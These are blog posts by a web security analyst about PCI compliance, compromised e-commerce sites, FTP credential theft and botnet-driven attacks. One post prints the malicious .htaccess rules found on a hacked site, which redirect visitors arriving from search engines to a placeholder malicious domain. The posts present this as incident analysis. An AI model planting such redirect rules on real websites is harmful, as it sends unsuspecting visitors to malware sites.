PCI is honestly my favorite standard in the progression of web application security out right now. Not because of the fact, that I believe that it is making an impact, but I do feel that it gives me the leverage as a consultant to force customers to secure their website.

One of the largest issues that I believe to be contained in the standard of PCI compliance, is their balance between identifying if a website or payment application is secure and the ease of use/compliance for the customer. I honestly feel that the requirements for PCI compliance are fairly minimal in verifying actual security.
Now, working at McAfee secure I should be the first one to be able to recognize that in order to have a successful standard or product, you must also make sure that your standard is obtainable. If you create a standard that is out of reach for most customers, then you will clearly have issues with generating a following that is not only able to satisfy the necessary conditions, but are willing to support the standard itself. The issue with this, is that you will soon find that you might have to make decisions about your product or standard that might not be in its best interest from a security standpoint, in order to accommodate the customer in being able to satisfy conditions to meet the standard.
Now, ask every security professional out there and they will most likely tell you the exact same answer, "There should absolutely be no accommodation's or settling, when it comes down to security". Based on this answer, I must say, that if PCI is going to be successful, they must find a way to properly verify that the payment application or website is secure, while still making the standard, an obtainable one.

I touched a little bit on this before in a previous post "who takes pci seriously" but I honestly believe that the only way that this standard is going to have a chance at being successful is to take the customization out of the customers hands. What do i mean by this?

Every e commerce site on the internet that takes Credit Card information , must have some type of payment application or shopping cart. In working with customers who come to us or end up compromised you start to notice certain common patterns. One of these common patterns that I have been able to establish, is a customer is way way way more prone to their site being compromised if they use their own custom payment application or shopping cart.

Chances are, with most custom payment applications or shopping carts, the application or shopping cart itself was not coded correctly with any type of security coding best practices, and is most likely insecure in one way or another. THIS WILL NEVER STOP. You are always going to have websites who would like a shopping cart custom tailored to their product, and they are not going to shell out the money to make sure that their custom app is coded correctly. This happens every day and for the most part, will never cease.

What does PCI need to do to head this issue off at the pass?
This type of programming will never quit, and if PCI wants to do anything about it, they need to act sooner than later. I believe that the Payment Application or shopping cart must be checked with the highest standards for security and there must not be any accommodation's in verification. One way to do this, I believe, is to make it apart of PCI's standard to state that all payment Applications must either be approved by the PCI council by going through some type of high level certification (VISA's list of validated payment applications) or the application or shopping cart must be subject to a level 1 audit.

What this will accomplish.
This should assist to eliminate all of the horribly coded shopping carts out there that look like they are apart of foundstones Hackme series containing literally every web application vulnerability that has been in current use for the last decade. Web site owners, will not just be able to hire the local web developer to create a very sophisticated shopping cart with their 3 months of development experience. There are so many approved shopping carts out there, that I feel that at least one of them would be able to accomplish the task and be customizable enough for the customer. If it is not, they obviously have a product that is unique and should have the funding to create a custom shopping cart and send it through the certification process.

In my opinion, this is a must. This to me is the only way to help verify that a payment application is secure and was written with coding best practices and security guidelines. This is also one of the only methods that I see fit, that after an initial fight, would be able to be adopted by anyone who is storing, processing, or transacting credit card information. Obviously an adjustment this large to a standard would need a grace period, but by some time before lets say the end of the world in 2012, a standard like this should be able to be adopted and carried out.

I am really interested in identifying either a better solution in improving the PCI standard or in identifying the faults in this type of modification. Any opinions would be greatly appreciated. I feel that PCI has made a huge start in helping to secure e commerce online, but it is still very far off of accomplishing its task.

An update to updating.

2009-06-08T09:55:00.000-07:00

One of the things that I keep telling myself that I am going to accomplish, is to update this blog more frequently. It is not the fact that I am picking up people who actually read this thing, but I would like to document more often, trends and issues that I am currently experiencing at my employment. The obstacle that I have been currently facing and have been facing since day one, is to publish to a blog, while never attempting to speak negatively about another security professional or company. I have no problems trying to identify an issue within a specific security practice, protocol or organization, but I will not use this blog to self promote myself by slandering another "professional" or the actual product of a specific company.
The reason for this, I am still what I consider a young individual in this field. There is no way that I am going to cutoff or eliminate opportunities to meet, discuss, or debate with security related professionals or issues.
So, with that being said, I am going to try to update this blog more often. I will try to stick with my ultimate goal here and try to properly document experiences, trends, and issues that I have been facing during my current employment. Although I find it very difficult to hold my tongue every once in a while because someone out there is being absolutely stupid from a security standpoint, I will try my best to focus directly on the issue itself from the security point of view and try not to include the individual or companies product.

I feel that this is a vital aspect to being a Security Professional and slandering an individual or company is something that I will leave to the 12 year old hackers.

How to compromise a secure website. (Gumblar)

2009-05-18T13:57:00.001-07:00

After watching the recent trend of Gumblar and its method of exploitation, you really have to ask yourself "How the hell do you protect your customers from this". Yes, their sever is compromised, But did it occur from a Web Application Vulnerability. Chances are the answer is "No". The majority of cases that I have seen from this recent trend, are all exploited through obtaining the FTP user credentials from a webmaster through their compromised workstation loaded with malware.

Now sitting back and thinking about this method of attack, you can really identify a lot of benefits to this type of exploitation.

1. You could technically compromise a completely secure web application and server. (ya I know, I am being loose on the word secure web application here)
2. For the most part, even if you remove the malicious links, you still need to track down the workstation that is compromised, which would result in a high probability of future compromise.
3. Once the infected workstation is detected, can you really do anything to secure it from this type of attack occurring again?
4. How long are these malicious urls up on the website before a trend is found and is flagged in an application such as Google Safe Browsing?

Sitting back and thinking about this, it is now a little easier for me to understand why an attacker with full FTP credentials to a website, would only go as far to place a small malicious link on their victims pages. There is no complete defacement, and no attempt to discover sensitive information on the webserver. From this you can easily discover the motivation for this type of attack. MONEY!.

I will just link to my last post that contains best practices to assist with prevention and increase security. Here

Botnets spreading their love to webservers, via obtaining FTP Credentials from a malware infected workstation.

2009-05-14T11:13:00.000-07:00

A nice little trend has been popping up and is becoming way more than a mere coincidence. Lately, a couple of customers have been calling up stating that their website has been compromised. The trend is usually the same where the good ol' malicious link has been embedded into multiple pages on their website. This trend has been very common with automated SQL injection attacks, but lately SQL injection has not been the culprit. After conducing an investigation, I have been identifying that the issue has been the result of an FTP breach. Now I have seen this method of breach occur in the past with the .htaccess file being modified (see previous post)

When an FTP breach usually occurs, you start running the customer through the traditional. Do you use strong passwords, do you change your password regularly, how many users share the login/pass in question, is your FTP application up to date with the latest security related patches? All of these have been coming back with an answer supplied that tend to rule out a possible exploit.

Now, I find that there are a lot of interesting things here, so I will try to remember all of the ones of the top of my head.

So far, I have seen 3 possible methods of exploitation.
1. The users FTP credentials are being compromised through malware installed on the clients workstation.
2. The FTP user credentials can be sniffed via plain text authentication.
3. The user is using weak FTP passwords, and can be brute forced (although I do not see any brute forcing in the FTP log files, I will still leave it open as a possibility)

While all of the instances that I have seen, look like they have been coming from malware installed on the clients workstation, I am a security analyst and always recommend solutions to cover all bases of possible methods of exploitation.

So what I find really interesting, is that an attacker/hacker has your FTP credentials, and all that they are doing, is embedding a link onto your website. I do not see any actions of defacement, installing backdoors, or attempting to obtain sensitive information. To me, this is quite odd. These are not hackers who are looking to create a name for themselves or trying to steal CC info out of your database. These are hackers, who are trying to spread their infection by crawling over the top of the single user, and passing their tactics onto your webserver to assist with growth.

I feel that this trend is very interesting because it further backs up the Security Professionals opinion that Botnets are evolving and becoming very specific on their objective and method of exploitation.

I will close out this post with recommendations to the client on what they can do to help secure the issue and assist with identifying the method of exploitation.

1. Change FTP user credentials often using strong passwords.
2. Hand out individual FTP credentials to anyone accessing the FTP server. This will assist with identifying where the FTP credentials are being leaked and is just good security practices. You will also want to remove all users who do not need access to the webserver.
3. Use a secure FTP server and client application. This will prevent the FTP authentication from being passed in plain text. Make sure you update your FTP server/client application to the most recent version or patch with all recent security related patches.
4. Run an anti-virus and malware detection tool on all workstations regularly.
5. Review FTP log files regularly looking for unauthorized authentication.

and the bonus question
.
Why is there not a popular application that exists or addon built into an ftp server, cpanel or plesk that notifies the client if a file has been added or modified within their account. This would prevent out of the ordinary modifications or new files from going unnoticed? And if there is one, why is it not in widespread use?

Do the Payment Card Industry Data Standards Reduce Cybercrime?

2009-04-21T10:49:00.000-07:00

Somebody was asking me where to find this, so I will post a quick link to the already old Subcommittee on Emerging Threats, Cybersecurity and Science and Technology

I wouldn't bother watching it, it does not do the serious issue justice when it really needs to be taken seriously.

The amount of Sensitive information being leaked during the time of this hearing, 1,434,434,334 Credit Card Numbers (not a real number). Keep it up, your making such great progress.

What happens when a company gets hacked?

2009-04-09T11:02:00.000-07:00

So what exactly happens when a company's website gets hacked. Is there anything setup that actually tries to identify if sensitive information has been obtained? Is there anything setup that helps verify that the company has indeed identified the issue and verified that the vector has been secured. I am going to have to say that for the majority if companies out there, the answer is no. What I have seen from personal experience is that the most important aspect of being hacked as a company, is to get the site back online and do anything necessary to make sure that the trust of the customer has not been lost. Currently, the way that things are setup (such as PCI), most companies do not disclose that they have been compromised, because it will have a serious impact in the trust of their site ultimately ending up with fewer sales.

There is something seriously wrong with this.

There is nothing that really mandates that a company disclose any information to the public or their customer other than individual state laws that have been put in place that most companies don't even know about. Now, I understand that we will always be faced with this issue that we will always have companies that will do anything necessary to not disclose their compromise and we will never be able to fully eliminate this issue.

What I believe that needs to be accomplished, is that PCI sets up a requirement or method that ASV/QSA's must take if a customer informs them that they have been compromised. There must be a standard setup that an ASV/QSA can follow that mandates the company to disclose the issue. It must also be the ASV/QSA's job to work with the company, to assist with identifying the vector that the compromise occurred with, and verifying that the vector has been secured.

If a company is required to disclose a compromise no matter what the size or impact may be, they will be a little more proactive in making sure that their website is secure. I understand that a company must worry about the affect of a disclosure but honestly, they have been compromised, and they should not have a choice. Their customers have the right to know that the site was insecure and that their personal information might have been revealed.

Also going in parallel with the fact that they have been compromised, is the understanding their website was indeed insecure and therefore they should not solely be responsible for mitigating the issue. They should be required to have their ASV/QSA assist them with the compromise and verify that they have indeed resolved all issues of insecurity.

If anyone out there knows the security of their website better than the company itself, I would say that it is their ASV/QSA or the attacker who was able to compromise their site. As an ASV/QSA you are usually able to get an opinion of the companies level or activeness in security by being able to monitor how long it takes them to fix an issue or their overall understanding of security. From this information the ASV/QSA will be able to generate a basic opinion of the companies overall determination to be secure. This can be used to assist the company in making sure that they are conducting the right operations to secure the website and are getting it right the first time. At the same time, the ASV/QSA can assist the company in preparing a public statement that identifies to their customers that they have been compromised. This will also verify that the company does not take the compromise lightly and release a public statement that does not accurately describe the level of compromise.

I want to close by asking, if any of you even know that Visa has a document of "What to do if Compromised" and if you have ever heard of a company ever following the procedure.
http://usa.visa.com/download/merchants/cisp_what_to_do_if_compromised.pdf

Also Check out.
PCIsecuritystandards.org keyword search for "Hacked"
PCIsecuritystandards.org keyword search for "Compromised"
Ill save you the excitement, They return 0 Results

What about these answers from the PCI council

If my business was deemed compliant but my system was still breached and payment account data compromised after the fact, what liability would my business incur?
--The PCI Security Standards Council is not responsible for levying any financial or operational consequences on businesses that have either been breached or are suspected of an account data compromise. These businesses should contact the individual payment brands regarding next steps, such as contacting law enforcement, or obtaining other relevant information, including potential consequences should a compromise have occurred.

Will the PCI Security Standards Council be involved in performing forensics investigations as a result of an account data compromise event?
--The PCI Security Standards Council will not conduct forensics investigations either directly or through a third party in the event of an account compromise.

Who takes PCI seriously?

2009-04-02T15:14:00.000-07:00

A good portion of my day consists of consulting for PCI compliance. After consulting with the customer on one issue after the other, you just really start to realize that the customer is not concerned with security what so ever. What they are concerned with, is getting the banks or whoever is auditing them off their back.
Why are the banks on their back? Well it is most likely not for security either. It is likely because they have identified PCI compliance as another revenue generator requesting customers to become complaint or pay a fine ($$), knowing that they will be out of compliance for at least some period of time . The banks are also teaming up with ASV/QSA's creating a partnership with them to basically spit the revenue stating that if you are not PCI compliant, the bank will provide an ASV/QSA for you. Now I am not stating that this is a bad thing because I would like to see companies become PCI compliant by any means necessary. What I am saying is that neither of these cases really have a concern for the actual security of each company.
One of the more difficult issues that I face with dealing with a company that is trying to obtain PCI compliance without a serious concern for security, is that they will do just about anything to obtain compliance. This includes removing devices from their account that are non PCI complaint in order to print a compliant report for the ones that are, without properly identifying the proper scope of network segmentation. Another common issue that I see, is customers providing inaccurate or false statements to verify that a vulnerability as been resolved due to patching or mitigation. More often than not, I see the customer remove the page in question in order to become PCI compliant just so that they can print a compliant report.
Now we do have checks that try to prevent this, but they are all based on the customers word. Now I am just taking a guess here, but if they are going as far as removing devices, pages, or applications temporarily, then they are most likely going to check a couple of check boxes with out even thinking twice about it.

Now what I am about to say is purely my own opinion, but I am sorry, I just don't see it occurring any other way.
Companies like Visa/Mastercard really need to force PCI compliance. The only way I see this as ever being successful, is that your Shopping Cart/Payment Application must be VISA/Mastercard approved.
What do I mean by that? I mean that if you have a shopping cart or payment application, it must go though a Level 1 PCI audit with Code review and be a visa/mastercard approved application.
Why do i believe this? Well, if you are a mom and pa shop, you should not be allowed to have your own custom shopping cart. You are not programming this application with security in mind and most likely it will not be secure. There are so many Visa Approved shopping carts out there that you should be able to find one that accommodates your needs.
If you are a "big time" enterprise company, then you should be able to have the necessary components to program a secure application and you should be able to have the funding to get the necessary Level 1 PCI audit with code review and have it approved by visa/mastercard.

Now i know that by saying this, a lot of security professionals are going to think that this would totally put someone like me out of business. I do not think so. Just because the payment application is secure, does not eliminate the threat. There are still other web application/network vulnerabilities out there. There is still a need to Pen test websites. There is still a need for PCI compliance.

Either way you look at it, something needs to change with the process that we take/store credit card information. If PCI is not going to be the leader in attempting to address this, then who is?

All Quiet on the Home Front.

2009-03-26T14:22:00.000-07:00

I just thought that I should update my blog to say that I don't really have anything to say.
I have been taking some personal time off of work and have really been off the frontlines for the last month.
One of the things that I have been up to, is trying to get involved in more security related discussions. It is sometimes difficult for me to participate in discussions of security because I am actually located away from the heart of it all. For someone like myself who refuses to incorporate computers into his personal life and not using one at his home, I have been trying to physically include myself. This involves going to OWASP chapter meetings, staying late after work to study, etc etc.

After March is over, i should be back to the same things. Until then, getting my garden ready for summer and saltwater fishing is my top priority. I am also putting on a Giant Pumpkin Growing contest and last night was able to contact the California State Record holder and went over to his house for an awesome discussion and he even gave me seeds to use from a pumpkin that was over 1200 pounds.

Somethings just dont rest as easy as others.

2009-02-03T11:27:00.000-08:00

I had a phone conversation this week that is still somewhat bothering me. This once again has to do with PCI.
Earlier this week I had a phone conversation with a gentleman who is affiliated with a major credit card company. This gentleman requested that a particular IP address be deleted from his company profile because the device contained a vulnerability that currently affected PCI. He was asking me to delete the device because he would like to print out a complaint PCI report and this vulnerability was preventing him from accomplishing this task. My entire conversation had to do with myself trying to make the customer understand that he needs to be very careful determining the scope of devices for his PCI compliance. The customers response to this, is that he will need to consult with his IT department and that he is only the Chief Security Adviser for the company.
Now I know that it doesn't take an elite Security Professional to recognize that something is quite odd about this and that if anyone should be following PCI to a T, it should be the major credit card companys (or an affiliate) themselves.
After I tried to provide as much information as possible the issue quickly became that they do not have enough resources to mitigate the issue and would just like to remove the device from their profile and they will address it at a later time. I then proceeded to inform the customer that we do ask them to verify that they have checked that all devices that are contained within the scope of PCI compliance are added to be scanned, and they we ask to verify that the user is not swaying the vulnerability information in anyway what so ever.

This phone call ultimately ended up with me pointing to the customer details on how to remove the device. I tried with a final point of consultation to have the customer read th PCI 1.2 documentation to determine the scope of all devices, and I was informed that he knew the documentation front to back and that it is not a concern.

I would love to describe the moral of the story to everyone, but I think this is a no brainer so i will leave it at that.

Is the Fishing Better on the Other Side of the River?

2009-01-15T08:14:00.000-08:00

Recently I was the subject of another Security Professionals Blog. My name was never mentioned in the blog itself because I have never been publicly identified, but the entire subject matter of the blog was my current task here at McAfee. Now I would believe that the majority of security professionals out there would not want their work to be criticized, but I actually feel the opposite. With all of the talk about the McAfee Secure Standard and how it could be improved, as a security professional myself, I fully agree. I do believe that Client Side Vulnerabilities such as Cross Site Scripting (XSS) and Cross Site Request Forgery (CSRF) should be a downgradable issue, however business decisions are rarely up to the security professionals themselves.

Now I was planning on identifying the PROs/CONs of being under current scrutiny of Security Professionals, but honestly, I could not find any CON's about it. Not only did the blog serve as a small acknowledgment that what I am doing here, is actually making a difference, but it also served as a tool that I could exploit to verify that this current issue was serious and needs to be addressed.

I wont go into details of how I used this Blog Post to my advantage, but I will tell you that it involved sending the link to multiple parties. This raised the severity of the issue to a more critical state and teams were placed immediately to resolve the issue. It is amazing how someone you have never spoken with or met, can make such an impact on your current position, by pointing out the obvious. Sometimes I guess the obvious is rarely understood until it is made an example of.

I would like to finish typing for a while (because I am lazy today) by asking if anyone out there would like to blog about our salaries or the impact that we actually have on a company. I feel that these are two topics that affect me directly and I would love for them to be open to scrutiny.

Update On Google 302 Redirect Exploit

2009-01-02T09:59:00.001-08:00

So I received an email from a compromised customer that has his web hosts explanation of how he received the google 302 redirect exploit. I found it quite interesting and I am currently working to see if it is in fact valid. I am having a few doubts( but it could easily be true) that this is exactly how this is occurring. Below is the response.

"In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client's websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named ".htaccess" to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:

http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009

* 79,469 websites have been spreading the Anti-Virus 2009 infection

* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime."

Quick Post On IE exploit and Botnets

2008-12-22T09:18:00.000-08:00

So we have seen it posted to our favorite RSS feed, Botnets are creating Automated SQL injection attacks attempting to exploit the new IE XML issue (Microsoft Technet Article). This issue has been beat to death within Blogs, but I just wanted to make a quick observation.

Are botnets laying low until a severe 0day exploit hits the public, or do they just go into overdrive. With all of the talk about the economy, we are led to assume that when the economy has trouble, they hackers come out, but lately I have seen a decrease in automated SQL injection attacks. I have seen this decrease both within McAfee and by viewing items such as Google Safe Browsing Lists.
Will this continue to decrease? What will provoke it again? How will it evolve? How big of an impact will the economy have? Can we use history as a guideline?

Where Have all the Bad Guys Gone???

2008-11-10T10:57:00.000-08:00

So I am finally fed up with it. Where have all the bad guys gone. I would like to reach out to all of you and let you know that I am starting to run out of side projects.

Since the beginning of 2008 I have seen a huge increase in Automated Blind SQL injection Attacks on websites. I was watching all of these attacks evolve (More on this to come later) into more and more crafty SQL statements attempting to inject a malicious .js file into the SQL database. From what I have been reading up on, Researchers have all agreed that botnets have been increasing almost exponentially over the last few months and are a huge contribution to these SQL injection attacks. Not only was a large part of my day taken up by testing and consulting on all previous compromises, but also in researching and evolving my Pen testing skills to be able to grow in workload to handle these increase in attacks.

Then August came. All of a sudden these attacks have almost come to a halt. My workload has decreased by at least 75% in automated compromises with no apparent warning. From a Security Conference I attended in September, I was informed that a few of the worlds largest botnets have suspended operations to overhaul their entire structure making them more efficient and more powerful. This has been a direct cause for the decrease in automated sql injection attacks, but will resume when activity picks back up within the botnets.

It has been a couple of months now since I have seen the decrease in successful automated SQL injection attacks. If you would have asked me, I would surly would have guessed that things would be "better than ever" in the botnet community by now, but I have not seen it in the end result.

I am waiting patiently for things to be back up to normal and like always would love any ideas/news/opinions on when this is going to happen.

Search Engine 302 Redirect in .htaccess file.

2008-11-07T08:02:00.000-08:00

A couple months ago I was working with a customer who whenever you attempt to go to their website via google or yahoo, you were redirected to this famous Anti-virusxp 2008 software. After playing around a bit in my proxy, I was able to determine that this was a "Referrer" specific problem. If you traveled to the website via address bar, you were fine, however if your referrer attribute was set to a major search engine domain such at google, aol, ask, or yahoo, you were automatically redirected to a malicious page.

After alerting the customer of this issue, I asked him if he could please keep me informed of what was causing this. I contacted him two days later only to hear that his hosting company has taken care of the issue and he has zero details for me regarding the compromise.

For some reason, I really liked this type of compromise. For the most part the website owner could be completely uneducated that this is occurring for months. This to me, is a compromise that does not take full advantage, but somewhat leeches off of you like a tape worm.

I wanted to see this issue again. So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer a site like google or yahoo. A month went by before I was able to see this again.

I was able to pick up on another Search Engine 302 redirect issue on the day that it was exploited. Our product detected and and i verified that it was valid. I was able to contact the customer and provide him with details about the issue and he was willing to work with me on determining how this was occurring.

Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files. In reviewing these log files, I did see a couple of RFI attempts but nothing that looked successful or from review of the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.

I was able to track down the problem and saw that the .htaccess file was replaced and contained the following.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]

So with the review on the website, I am starting to point myself in the direction that there is an issue with the file permissions on the webserver.

This site was hosted through a large Hosting Provider in which I have already had previous issues with.

I had a Compromised Account come to me with an IFrame embedded on their website and all of the images deleted from the webserver. When looking up the iframe on google. I saw 20 different domains with the same iframe all hosted by by the same hosting provider. We came to the conclusion that there was probably some serious permission issues on the webserver. I had the customer move to a different hosting environment and they have not experienced a compromise since. I am guessing that this site might be experiencing the same type of problem.

If you have any more information to this issue, I would love to know about it. I really enjoy working with these types of compromise because they are few and far between and to me, seem well though out in design.

An Introduction

2008-11-06T14:31:00.000-08:00

So I have decided to start working on SEO for my life. I know this sounds a little dumb, but everyone is doing it, and well, I need to capitalize on it also.

My name is James A Lester and I am a Security Analyst for McAfee's Mcafee Secure Product.
My Current Position At McAfee is a Senior Level Analyst. The majority of my Position is to review Compromised Websites, determining how the compromised occurred and verifying that the website is further secured from the compromise occuring in the future.

I really enjoy my positon as I feel that I am on the frontlines of Web Application Security. I feel that I am viewing 0day information in SQL injection, CSRF, XSS, RFI/LFI, ect ect.

What I am hoping to get out of this blog, is to post any information that I am currently seeing coming down the pipe in the Security World, and see if anyone else is has anything to provide in the discussion.

I will try to remember to update this blog (keyword try, I dont think i have updated my resume since High School except for adding jobs) with anything that I am working on in the world of security or anything that I feel like.